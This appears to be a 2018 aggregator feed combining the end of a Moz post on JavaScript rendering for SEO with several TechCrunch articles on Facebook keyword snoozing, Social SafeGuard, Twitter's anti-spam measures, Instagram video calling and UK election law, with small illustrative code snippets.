Now that we know the domain is using JavaScript to load in crucial content, and that Googlebot is most likely not seeing that content, the final step is to recommend an ideal solution to the client. Key word: recommend, not implement. It’s 100% our job to flag the issue to our client, explain why it’s important (as well as the possible implications), and highlight an ideal solution. It is 100% not our job to try to do the developers’ job of figuring out an ideal solution with their unique stack/resources/etc.

How do we do that?

You want server-side rendering

The main reason Google is having trouble seeing Sitecore’s landing page right now is that the page asks the user (us, Googlebot) to do the heavy work of loading its JavaScript. In other words, they’re using client-side JavaScript.

Googlebot is literally landing on the page, trying to execute the JavaScript as best it can, and then needing to leave before it has a chance to see any content.

The fix here is to instead have Sitecore’s landing page load on their server. In other words, we want to take the heavy lifting off of Googlebot, and put it on Sitecore’s servers. This will ensure that when Googlebot comes to the page, it doesn’t have to do any heavy lifting and instead can crawl the rendered HTML.

In this scenario, Googlebot lands on the page and already sees the HTML (and all the content).
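To make the contrast concrete, here is a tiny illustration of the two responses a crawler might receive; the markup is invented for the example and is not Sitecore's actual page.

    // Illustrative only: what a non-rendering crawler receives in each setup.

    // Client-side rendering: the initial HTML is an empty shell, and the content
    // only exists after the browser downloads and executes bundle.js.
    const clientSideResponse = `
      <html><head><title>Sitecore Symposium</title></head>
      <body><div id="app"></div><script src="/bundle.js"></script></body></html>`;

    // Server-side rendering: the same content is already in the HTML, so Googlebot
    // can index it without executing any JavaScript.
    const serverSideResponse = `
      <html><head><title>Sitecore Symposium</title></head>
      <body><div id="app"><h1>Sitecore Symposium</h1>
      <p>Whether you are in marketing, business development, or IT...</p></div></body></html>`;

    console.log(clientSideResponse.includes("Whether you are in marketing")); // false
    console.log(serverSideResponse.includes("Whether you are in marketing")); // true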

There are more specific options (like isomorphic setups)

This is where it gets to be a bit in the weeds, but there are hybrid solutions. The best one at the moment is an isomorphic setup.

In this model, we're asking the client to load the first request on their server, and then any future requests are made client-side.

So Googlebot comes to the page, the client’s server has already executed the initial JavaScript needed for the page, sends the rendered HTML down to the browser, and anything after that is done on the client-side.

If you’re looking to recommend this as a solution, please read this post from the Airbnb team, which covers isomorphic setups in detail.
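For a sense of what that looks like in code, here is a heavily simplified sketch assuming a React + Express stack (one common way to do it; the file names and component are invented, and the Airbnb post above covers production-grade setups).

    // shared/App.tsx: one component, rendered on both server and client (illustrative).
    import React from "react";
    export const App = () => (
      <main>
        <h1>Sitecore Symposium</h1>
        <p>Rendered on the server first, then taken over by the client.</p>
      </main>
    );

    // server.tsx: the first request is rendered to HTML on the server.
    import express from "express";
    import { renderToString } from "react-dom/server";
    import { App } from "./shared/App";

    const server = express();
    server.get("/", (_req, res) => {
      const markup = renderToString(<App />);
      res.send(`<!doctype html><html><body><div id="root">${markup}</div>
        <script src="/client.js"></script></body></html>`);
    });
    server.listen(3000);

    // client.tsx: the browser attaches to the markup the server already sent, instead
    // of re-rendering it; everything after this first paint happens client-side.
    import { hydrate } from "react-dom";
    import { App } from "./shared/App";
    hydrate(<App />, document.getElementById("root"));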

AJAX crawling = no go

I won’t go into details on this, but just know that Google’s previous AJAX crawling solution for JavaScript has since been deprecated and will eventually stop working. We shouldn’t be recommending this method.

(However, I am interested to hear any case studies from anyone who has implemented this solution recently. How has Google responded? Also, here’s a great write-up on this from my colleague Rob.)

Summary

At the risk of severely oversimplifying, here's what you need to do in order to start working with JavaScript and SEO in 2018:

  1. Know when/where your client’s domain uses client-side JavaScript to load in on-page content or links.
    1. Ask the developers.
    2. Turn off JavaScript and do some manual testing by page template.
    3. Crawl using a JavaScript crawler.
  2. Check to see if Googlebot is seeing content the way we intend it to.
    1. Google’s mobile friendliness checker.
    2. Doing a site:search for visible content on the page.
    3. Crawl using a JavaScript crawler.
  3. Give an ideal recommendation to client.
    1. Server-side rendering.
    2. Hybrid solutions (isomorphic).
    3. Not AJAX crawling.

Further resources

I’m really interested to hear about any of your experiences with JavaScript and SEO. What are some examples of things that have worked well for you? What about things that haven’t worked so well? If you’ve implemented an isomorphic setup, I’m curious to hear how that’s impacted how Googlebot sees your site.





source https://moz.com/blog/javascript-and-seo

Wednesday, 27 June 2018

Facebook tests 30-day keyword snoozing to fight spoilers, triggers

Don’t want to know the ending of a World Cup game or an Avengers movie until you’ve watched it, or just need to quiet an exhausting political topic like “Trump”? Facebook is now testing the option to “snooze” specific keywords so you won’t see them for 30 days in News Feed or Groups. The feature is rolling out to a small percentage of users today. It could make people more comfortable browsing the social network when they’re trying to avoid something, and less guilty about posting on sensitive topics.

The feature was first spotted in the Facebook app’s code on Sunday by Chris Messina, who told TechCrunch he found a string for “snooze keywords for 30 days”. We reached out to Facebook on Monday; the company didn’t initially respond, but last night it provided details we could publish at 5am this morning ahead of an official announcement later today. The test follows the rollout of snoozing people, Pages and Groups last December.

To snooze a keyword, you first have to find a post that includes it. That kind of defeats the whole purpose since you might run into the spoiler you didn’t want to see. But when asked about that problem, a Facebook spokesperson told me the company is looking into adding a preemptive snooze option in the next few weeks, potentially in News Feed Preferences. It’s also considering a recurring snooze list so you could easily re-enable hiding your favorite sports team before any game you’ll have to watch on delay.

For now, though, when you see the word you can hit the drop-down arrow on the post which will reveal an option to “snooze keywords in this post”. Tapping that reveals a list of nouns from the post you might want to nix, without common words like “the” in the way. So if you used the feature on a post that said “England won its World Cup game against Tunisia! Yes!”, the feature would pull out “World Cup”, “England”, and “Tunisia”. Select all that you want to snooze, and posts containing them will be hidden for a month. Currently, the feature only works on text, not images, and won’t suggest synonyms you might want to snooze as well.

The spokesperson says the feature “was something that kept coming up” in Facebook interviews with users. The option applies to any organic content, but you can’t block ads with it, so if you snoozed “Deadpool” you wouldn’t see posts from friends about the movie but might still see ads to buy tickets. Facebook’s excuse for this is that ads belong to “a separate team, separate algorithm”, but surely it just doesn’t want to open itself up to users mass-blocking its revenue driver. The spokesperson also said that snoozing isn’t currently being used for other content and ad targeting purposes.

We asked why users can’t permanently mute keywords like Twitter launched in November 2016, or the way Instagram launched keyword blocking for your posts’ comments in September 2016. Facebook says “If we’re hearing from people that they want more or less time” that might get added as the feature rolls out beyond a test. There is some sense to defaulting to only temporary muting, as users might simply forget they blocked their favorite sports team before a big game, and then wouldn’t see it mentioned forever after.

But when it comes to abuse, permanent muting is something Facebook really should offer. Instead it’s relied on users flagging abuse like racial slurs, and it recently revealed its content moderation guidelines. Some topics that are fine for others could be tough for certain people to see, though, and helping users prevent trauma probably deserves to be prioritized above stopping reality TV spoilers.



source https://techcrunch.com/2018/06/27/facebook-keyword-snooze/

Social SafeGuard scores $11M to sell alerts for brand-damaging fakes

Social SafeGuard, a U.S. startup founded in 2014 that sells enterprise security services aimed at mitigating a range of digital risks that lie outside the corporate firewall, has closed an $11 million Series B funding round from AllegisCyber and NightDragon Security.

It’s hoping to ride the surge in awareness around social media fakery — putting the new funding towards sales and marketing, plus some product dev.

“As one of the few dedicated cybersecurity venture firms, we know how big this challenge has become for today’s security executives,” said Spencer Tall, MD of AllegisCyber, in a supporting statement. Tall is joining the Social SafeGuard board.

“This is no longer a fringe need that can be ignored or deferred. Digital risk protection should be on the shortlist of corporate security priorities for the next decade,” he adds.

Social SafeGuard’s SaaS platform is designed to alert customers to risks that might cause damage to a business or brand’s reputation — such as brand impersonation, compliance issues or even the spread of fake news — as well as more pure-play security threats, such as social phishing, malware, spam and fake accounts.

Its platform uses machine learning and a customized policy engine to offer real-time monitoring of 50 digital and social channels (integrating via an API hub) — including social media platforms, mobile messaging apps, IM tools like Slack, unified comms platforms (Skype for Business, etc.), cloud apps like Office 365, blogs and news sites, and the dark web.

The types of threats the platform is trained to look out for include malicious message content, inappropriate images, malicious links, account takeover attempts and brand impersonation.

“Digital risks to any enterprise are twofold: internal or external — from employees communicating in non-compliant ways that expose a business to regulatory danger to more typical cyber threats like phishing, malware, account hacks or brand impersonation. Social SafeGuard helps mitigate all of these new digital risks by giving companies the tools to detect threats and defend against them, so they can adopt new technologies without fear,” says founder and CEO Jim Zuffoletti.

As well as threat detection and real-time notification, the platform includes built in take-down requests and follow-through — “to make threat management as responsive as possible”, as he puts it.

Social SafeGuard’s software also does risk scoring to aid the rapid triage of potential threats, and uses AI to try to anticipate “potential attacks and identify known bad actors” — so it’s responding to a wider security industry shift from purely defensive, reactive actions towards pro-active detection and response.

On the compliance front, the platform includes a governance and customizable policy engine that enterprises can use to monitor employee and partner communications for regulatory violations.

“For compliance-focused clients, messages are archived with automated audit trails that provide transparency and clarity,” notes Zuffoletti.

The platform has around 50 customers at this stage. Zuffoletti says its biggest customers are in the financial services and life sciences sectors — but says high tech is its fastest-growing sector.

Examples of the kinds of attacks its tools have been used to prevent include account takeovers, malware attacks, financial regulations violations, and FCPA and HIPAA violations.

“In one recent example, we were able to perform a forensic analysis of an online securities fraud scheme, which also posed brand reputation issues for one of our clients,” he adds. “Our platform is adaptable to evolving hybrid threats, too.”

On the competitive front, Zuffoletti namechecks the likes of Proofpoint and RiskIQ.



source https://techcrunch.com/2018/06/27/social-safeguard-scores-11m-to-sell-alerts-for-brand-damaging-fakes/

Twitter puts a tighter squeeze on spambots

Twitter has announced a range of actions intended to bolster efforts to fight spam and “malicious automation” (aka bad bots) on its platform — including increased security measures around account verification and sign-up; running a historical audit to catch spammers who signed up when its systems were more lax; and taking a more proactive approach to identifying spam activity to reduce its ability to make an impact.

It says the new steps build on previously announced measures to fight abuse and trolls, and new policies on hateful conduct and violent extremism.

The company has also recently been publicly seeking new technology and staff to fight spam and abuse.

All of which is attempting to turn around Twitter’s reputation for being awful at tackling abuse.

“Our focus is increasingly on proactively identifying problematic accounts and behavior rather than waiting until we receive a report,” Twitter’s Yoel Roth and Del Harvey write in the latest blog update. “We focus on developing machine learning tools that identify and take action on networks of spammy or automated accounts automatically. This lets us tackle attempts to manipulate conversations on Twitter at scale, across languages and time zones, without relying on reactive reports.”

“Platform manipulation and spam are challenges we continue to face and which continue to evolve, and we’re striving to be more transparent with you about our work,” they add, after giving a progress update on the performance of its anti-spambot systems, saying they picked up more than 9.9M “potentially spammy or automated accounts” per week in May, up from 6.4M in December 2017 and 3.2M in September.

Among the welcome — if VERY long overdue — changes is an incoming requirement for new accounts to confirm either an email address or phone number when they sign up, in order to make it harder for people to register spam accounts.

“This is an important change to defend against people who try to take advantage of our openness,” they write. “We will be working closely with our Trust & Safety Council and other expert NGOs to ensure this change does not hurt someone in a high-risk environment where anonymity is important. Look for this to roll out later this year.”

The company has also been wading into its own inglorious legacy of spam failure by conducting historical audits of some legacy sign-up systems to try to clear bad actors off the platform.

Well, better late than never as they say.

Twitter says it’s already identified “a large number” of suspected spam accounts as a result of investigating misuse of an old part of its signup flow — saying these are “primarily follow spammers”, i.e. spambots who automatically or bulk followed verified or other high-profile accounts at the point of sign up.

And it says it will be challenging these accounts to prove its ‘spammer’ classification wrong.

As a result of this it warns that some users may see a drop in their follow counts.

“When we challenge an account, follows originating from that account are hidden until the account owner passes that challenge. This does not mean accounts appearing to lose followers did anything wrong; they were the targets of spam that we are now cleaning up,” it writes. “We’ve recently been taking more steps to clean up spam and automated activity and close the loopholes they’d exploited, and are working to be more transparent about these kinds of actions.”

“Our goal is to ensure that every account created on Twitter has passed some simple, automatic security checks designed to prevent automated signups. The new protections we’ve developed as a result of this audit have already helped us prevent more than 50,000 spammy signups per day,” it adds.

As part of this shift in approach to reduce the visibility and power of spambots by impacting their ability to bogusly influence genuine users, Twitter has also tweaked how it displays follower and like counts across its platform — saying it’s now updating account metrics in “near-real time”.
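
For a sense of how hiding challenged accounts could feed into a near-real-time follower count, here is a simplified Python sketch. It is a guess at the general mechanism (the data structures and displayed_follower_count helper are invented), not Twitter’s actual code or data model.

# Illustrative only: excluding challenged accounts from a displayed follower count.
# This is a guess at the general idea, not Twitter's real data model or code.

followers = {
    # account -> set of follower ids
    "@example_brand": {"u1", "u2", "u3", "u4"},
}

challenged = {"u2", "u4"}   # accounts locked pending an anti-spam challenge

def displayed_follower_count(account: str) -> int:
    """Count only followers who are not currently locked behind a challenge."""
    return sum(1 for f in followers.get(account, set()) if f not in challenged)

print(displayed_follower_count("@example_brand"))  # 2 (the two challenged follows are hidden)

# If u2 later passes the challenge, it is removed from `challenged`
# and the next recomputation restores that follow to the visible count.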

So it warns users they may notice their account metrics changing more regularly.

“But we think this is an important shift in how we display Tweet and account information to ensure that malicious actors aren’t able to artificially boost an account’s credibility permanently by inflating metrics like the number of followers,” it adds — noting also that it’s taking additional steps to reduce spammer visibility which it will have more to say about “in the coming weeks”.

Another change Twitter is flagging up now is an expansion of its malicious behavior detection systems. On this it says it’s automating some processes where it sees suspicious account activity — such as “exceptionally high-volume tweeting with the same hashtag, or using the same @handle without a reply from the account you’re mentioning”.
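
A crude sketch of what such a behavioral heuristic could look like follows; the thresholds, window size and helper names are made up for illustration and are not Twitter’s real rules.

# Illustrative only: a sliding-window heuristic in the spirit Twitter describes.
# Thresholds and the window size are invented assumptions.

from collections import defaultdict, deque
import time

WINDOW_SECS = 3600            # look at the last hour of activity
HASHTAG_LIMIT = 50            # "exceptionally high-volume" tweeting of one hashtag
UNREPLIED_MENTION_LIMIT = 30  # repeated @mentions that never draw a reply

hashtag_events = defaultdict(deque)   # (account, hashtag) -> recent timestamps
mention_events = defaultdict(deque)   # (account, mentioned_handle) -> recent timestamps

def _count_in_window(events, now):
    """Record one event and return how many fall inside the sliding window."""
    events.append(now)
    while events and now - events[0] > WINDOW_SECS:
        events.popleft()
    return len(events)

def is_suspicious(account, hashtag=None, mention=None, mention_got_reply=True, now=None):
    """Flag accounts whose recent posting pattern looks automated."""
    now = time.time() if now is None else now
    if hashtag and _count_in_window(hashtag_events[(account, hashtag)], now) > HASHTAG_LIMIT:
        return True
    if mention and not mention_got_reply:
        if _count_in_window(mention_events[(account, mention)], now) > UNREPLIED_MENTION_LIMIT:
            return True
    return False

# Example: 60 tweets with the same hashtag inside an hour trips the heuristic.
start = time.time()
print(any(is_suspicious("@bot_account", hashtag="#crypto", now=start + i) for i in range(60)))  # True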

And while that’s clearly great news for anyone who hates high volume spam — and the damage spamming can very evidently do — it’s also a crying shame it’s taken Twitter this long to take these kinds of obvious problems seriously.

Better late than never is pretty cold comfort when you consider the ugly social divisions that malicious entities have fueled by being so freely able to misappropriate the amplification power of social media. Because tech CEOs were essentially asleep at the wheel — and deaf to the warnings being sounded about their tools for years.

There’s clearly a human cost to platforms prioritizing growth at the expense of wider societal responsibilities, as Facebook has also been realizing of late.

And while both companies may now be trying to clean house, there are no quick fixes for the rips in the social fabric that were exacerbated by the at-scale spread of fake news (and worse) enabled by their own platforms.

Though, in March, Twitter CEO Jack Dorsey put out a call for ideas to help it capture, measure and evaluate healthy interactions on its platform and the health of public conversations generally — saying: “Ultimately we want to have a measurement of how it affects the broader society and public health, but also individual health, as well.”

So a differently striped, more civically minded Twitter is seeking to emerge from the bushes.

Twitter users who fall foul of its new automated malicious behavior checks can expect to have to pass some sort of ‘no, actually I am human’ test — which it says will “vary in intensity”, giving examples such as a simple reCAPTCHA process, at the lowest friction end, or a slightly more arduous password reset request.

“More complex cases are automatically passed to our team for review,” it adds.
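
Here is one illustrative way that escalating challenge ‘intensity’ could be mapped in code. The tiers echo the examples in Twitter’s post, but the pick_challenge helper and its scoring thresholds are invented.

# Illustrative only: mapping a suspicion level to challenge "intensity".
# The tiers mirror the blog post's examples; the scoring is entirely made up.

def pick_challenge(suspicion: float) -> str:
    """Return the friction level to apply to a flagged account (suspicion in 0.0-1.0)."""
    if suspicion < 0.3:
        return "none"             # let the account continue unchallenged
    if suspicion < 0.6:
        return "recaptcha"        # low-friction 'prove you are human' check
    if suspicion < 0.85:
        return "password_reset"   # slightly more arduous, per the post's example
    return "manual_review"        # more complex cases go to a human team

for s in (0.2, 0.5, 0.7, 0.9):
    print(s, "->", pick_challenge(s))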

There’s also an appeals process for users who believe they have been incorrectly IDed by one of the automated spam detection systems — letting them request a case review.

Another welcome if tardy addition: stronger two-factor authentication. Users can now register a USB security key (based on the U2F open authentication standard) for login verification when signing into Twitter.

It urges users to enable 2FA if they haven’t already, and regularly review third party apps attached to their account to revoke access they no longer wish to grant.

The company finishes by saying it will continue to invest “across the board” to try to tackle spam and malicious automated activity, including by “leveraging machine learning technology and partnerships with third parties” — saying: “These issues are felt around the world, from elections to emergency events and high-profile public conversations. As we have stated in recent announcements, the public health of the conversation on Twitter is a critical metric by which we will measure our success in these areas.”

The results of a Request for Proposals for public health metrics research which Twitter called for earlier this year will be announced soon, it adds.



source https://techcrunch.com/2018/06/27/twitter-puts-a-tighter-squeeze-on-spambots/

Tuesday, 26 June 2018

Instagram now lets you 4-way group video chat as you browse

Instagram’s latest assault on Snapchat, FaceTime, and Houseparty launches today. TechCrunch scooped back in March that Instagram would launch video calling, and the feature was officially announced at F8 in May. Now it’s actually rolling out to everyone on iOS and Android, allowing up to four friends to group video call together through Instagram Direct.

With the feed, Stories, messaging, Live, IGTV, and now video calling, Instagram is hoping to become a one-stop-shop for its 1 billion users’ social needs. This massive expansion in functionality over the past two years is paying off according to SimilarWeb, which estimates that the average US user has gone from spending 29 minutes per day on the app in September 2017 to 55 minutes today. More time spent means more potential ad views and revenue for the Facebook subsidiary that a Bloomberg analyst just valued at $100 billion after it was bought for less than $1 billion in 2012.

One cool feature of Instagram Video Calling is that you can minimize the window and bounce around the rest of Instagram without ending the call. That opens new opportunities for co-browsing with friends as if you were hanging out together. More friends can join an Instagram call in progress, though you can mute them if you don’t want to get more call invites. You’re allowed to call anyone you can Direct message by hitting the video button in a chat, and blocked people can’t call you.

Here’s how Instagram’s group video calling stacks up to the alternatives:

  • Instagram – 4-way plus simultaneous browsing
  • Snapchat – 16-way
  • FaceTime – 32-way (coming in iOS 12 this fall)
  • Houseparty – 8-way per room with limitless parallel rooms
  • Facebook Messenger – 6-way with up to 50 people listening via audio

Instagram is also rolling out two more features promised at F8. The Explore page will now be segmented to show a variety of topic channels that reveal associated content below. Previously, Explore’s 200 million daily users just saw a random mish-mash of popular content related to their interests, with only a single “Videos You Might Like” section broken out.

Now users will see a horizontal tray of channels atop Explore, including an algorithmically personalized For You collection, plus ones like Art, Beauty, Sports, and Fashion depending on what content you regularly interact with. Users can swipe between the categories to browse, and then scroll up to view more posts from any they enjoy. A list of sub-hashtags appears when you open a category, like #MoGraph (motion graphics) or #Typeface when you open art. And if you’re sick of seeing a category, you can mute it. Strangely, Instagram has stripped Stories out of Explore entirely, but when asked, the team told us it plans to bring Stories back in the near future.

The enhanced Explore page could make it easier for people to discover new creators. Growing the audience of these content makers is critical to Instagram as it strives to be their favorite app amid stiff competition. Snapchat lacks a dedicated Explore section or other audience-growing opportunities, which has alienated some creators, while Instagram’s new topic channels are reminiscent of YouTube’s mobile Trending page.

Instagram’s new Explore Channels (left) vs YouTube’s Trending page (right)

Finally, Instagram is rolling out Camera Effects designed by partners, starting with Ariana Grande, BuzzFeed, Liza Koshy, Baby Ariel, and the NBA. If you’re following these accounts, you’ll see their effect in the Stories camera, and you can hit Try It On if you spot a friend using one you like. This opens the door to accounts all offering their own augmented reality and 2D filters without the Stories camera becoming overstuffed with lenses you don’t care about.

Instagram’s new partner-made camera effects

What’s peculiar is that all of these features are designed to boost the amount of time you spend on Instagram just as it’s preparing to launch a Usage Insights dashboard for tracking if you’re becoming addicted to the app. At least the video calling and camera effects promote active usage, but Explore definitely encourages passive consumption that research shows can be unhealthy.

Therein lies the rub of Instagram’s mission and business model with its commitment to user wellbeing. Despite CEO Kevin Systrom’s stated intention that “any time [spent on his app] should be positive and intentional” and that he wants Instagram to “be part of the solution”, the company earns more by keeping people glued to the screen rather than present in their lives.



source https://techcrunch.com/2018/06/26/instagram-group-video-calling/


The Advanced SEO Formula That Helped Me Rank For 477,000 Keywords

Can you guess how many keywords I rank for?

Well, you are probably going to say 477,000 because I used that number in the title of this post.

source https://neilpatel.com/blog/keyword-research-formula/

Digital campaigning vs democracy: UK election regulator calls for urgent law changes

A report by the UK’s Electoral Commission has called for urgent changes in the law to increase transparency about how digital tools are being used for political campaigning, warning that an atmosphere of mistrust is threatening the democratic process.

The oversight body, which also regulates campaign spending, has spent the past year examining how digital campaigning was used in the UK’s 2016 EU referendum and 2017 general election — as well as researching public opinion to get voters’ views on digital campaigning issues.

Among the changes the Commission wants to see is greater clarity around election spending to try to prevent foreign entities pouring money into domestic campaigns, and beefed up financial regulations including bigger penalties for breaking election spending rules.

It also has an ongoing investigation into whether pro-Brexit campaigns — including the official Vote Leave campaign — broke spending rules. And last week the BBC reported on a leaked draft of the report suggesting the Commission will find the campaigns broke the law.

Last month the Leave.EU Brexit campaign was also fined £70,000 after a Commission investigation found it had breached multiple counts of electoral law during the referendum.

Given the far larger sums now routinely being spent on elections — another pro-Brexit group, Vote Leave, had a £7M spending limit (though it has also been accused of exceeding that) — a £70,000 penalty looks like small change, and it’s clear the Commission needs far larger teeth if it’s to have any hope of enforcing the law.

Digital tools have lowered the barrier to entry for election fiddling, while also helping to ramp up democratic participation.

“On digital campaigning, our starting point is that elections depend on participation, which is why we welcome the positive value of online communications. New ways of reaching voters are good for everyone, and we must be careful not to undermine free speech in our search to protect voters. But we also fully recognise the worries of many, the atmosphere of mistrust which is being created, and the urgent need for action to tackle this,” writes commission chair John Holmes.

“Funding of online campaigning is already covered by the laws on election spending and donations. But the laws need to ensure more clarity about who is spending what, and where and how, and bigger sanctions for those who break the rules.

“This report is therefore a call to action for the UK’s governments and parliaments to change the rules to make it easier for voters to know who is targeting them online, and to make unacceptable behaviour harder. The public opinion research we publish alongside this report demonstrates the level of concern and confusion amongst voters and the will for new action.”

The Commission’s key recommendations are:

  • Each of the UK’s governments and legislatures should change the law so that digital material must have an imprint saying who is behind the campaign and who created it
  • Each of the UK’s governments and legislatures should amend the rules for reporting spending. They should make campaigners sub-divide their spending returns into different types of spending. These categories should give more information about the money spent on digital campaigns
  • Campaigners should be required to provide more detailed and meaningful invoices from their digital suppliers to improve transparency
  • Social media companies should work with us to improve their policies on campaign material and advertising for elections and referendums in the UK
  • UK election and referendum adverts on social media platforms should be labelled to make the source clear. Their online databases of political adverts should follow the UK’s rules for elections and referendums
  • Each of the UK’s governments and legislatures should clarify that spending on election or referendum campaigns by foreign organisations or individuals is not allowed. They would need to consider how it could be enforced and the impact on free speech
  • We will make proposals to campaigners and each of the UK’s governments about how to improve the rules and deadlines for reporting spending. We want information to be available to voters and us more quickly after a campaign, or during
  • Each of the UK’s governments and legislatures should increase the maximum fine we can sanction campaigners for breaking the rules, and strengthen our powers to obtain information outside of an investigation

The recommendations follow revelations by Chris Wylie, the Cambridge Analytica whistleblower (pictured at the top of this post) — who has detailed to journalists and regulators how Facebook users’ personal data was obtained and passed to the now defunct political consultancy for political campaigning activity without people’s knowledge or consent.

In addition to the Cambridge Analytica data misuse scandal, Facebook has also been rocked by earlier revelations of how extensively Kremlin-backed agents used its ad targeting tools to try to sow social division at scale — including targeting the 2016 US presidential election.

The Facebook founder, Mark Zuckerberg, has since been called before US and EU lawmakers to answer questions about how his platform operates and the risks it’s posing to democratic processes.

The company has announced a series of changes intended to make it more difficult for third parties to obtain user data, and to increase transparency around political advertising — adding a requirement for such ads to carry details of who has paid for them, for example, and also offering a searchable archive.

Although critics question whether the company is going far enough — asking, for example, how it intends to determine what is and is not a political advert.

Facebook is not offering a searchable archive for all ads on its platform, for example.

Zuckerberg has also been accused of equivocating in the face of lawmakers’ concerns, with politicians on both sides of the Atlantic calling him out for providing evasive, misleading or intentionally obfuscating responses to concerns and questions around how his platform operates.

The Electoral Commission makes a direct call for social media firms to do more to increase transparency around digital political advertising and remove messages which “do not meet the right standards”.

“If this turns out to be insufficient, the UK’s governments and parliaments should be ready to consider direct regulation,” it also warns. 

We’ve reached out to Facebook for comment and will update this post with any response.

A Cabinet Office spokeswoman told us it would send the government response to the Electoral Commission report shortly — so we’ll also update this post when we have that.

The UK’s data protection watchdog, the ICO, has an ongoing investigation into the use of social media data for political campaigning — and commissioner Elizabeth Denham recently made a call for stronger disclosure rules around political ads and a code of conduct for social media firms. The body is expected to publish the results of its long-running investigation shortly.

At the same time, a DCMS committee has been running an inquiry into the impact of fake news and disinformation online, including examining the impact on the political process. Though Zuckerberg has declined its requests to personally testify — sending a number of minions in his place, including CTO Mike Schroepfer, who was grilled for around five hours by irate MPs and whose answers still left them dissatisfied.

The committee will set out the results of this inquiry in another report touching on the impact of big tech on democratic processes — likely in the coming months. Committee chair Damian Collins tweeted today to say the inquiry has “also highlighted how out of date our election laws are in a world increasingly dominated by big tech media”.

On its forthcoming Brexit campaign spending report, an Electoral Commission spokesperson told us: “In accordance with its Enforcement Policy, the Electoral Commission has written to Vote Leave, Mr Darren Grimes and Veterans for Britain to advise each campaigner of the outcome of the investigation announced on 20 November 2017. The campaigners have 28 days to make representations before final decisions are taken. The Commission will announce the outcome of the investigation and publish an investigation report once this final decision has been taken.”



source https://techcrunch.com/2018/06/26/digital-campaigning-vs-democracy-uk-election-regulator-calls-for-urgent-law-changes/